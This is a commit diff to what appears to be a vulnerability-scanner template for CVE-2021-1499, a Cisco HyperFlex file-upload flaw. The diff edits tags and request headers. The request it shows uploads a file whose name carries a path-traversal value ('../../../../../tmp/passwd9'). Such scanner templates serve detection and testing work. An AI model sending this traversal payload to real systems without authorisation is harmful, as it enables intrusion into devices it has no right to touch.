misc update

patch-1
Sandeep Singh 2021-10-02 18:02:45 +05:30 committed by GitHub
parent 1b3807a94d
commit f033458524
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 4 deletions

View File

@ -8,7 +8,7 @@ info:
reference: reference:
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499 - https://nvd.nist.gov/vuln/detail/CVE-2021-1499
tags: cve,cve2021,cisco,rce,oob tags: cve,cve2021,cisco
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 5.3 cvss-score: 5.3
@ -23,9 +23,8 @@ requests:
Accept: */* Accept: */*
Accept-Encoding: gzip, deflate Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583 Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
Origin: https://{{Hostname}} Origin: {{RootURL}}
Connection: close Referer: {{RootURL}}
Referer: https://{{Hostname}}/
-----------------------------253855577425106594691130420583 -----------------------------253855577425106594691130420583
Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9" Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"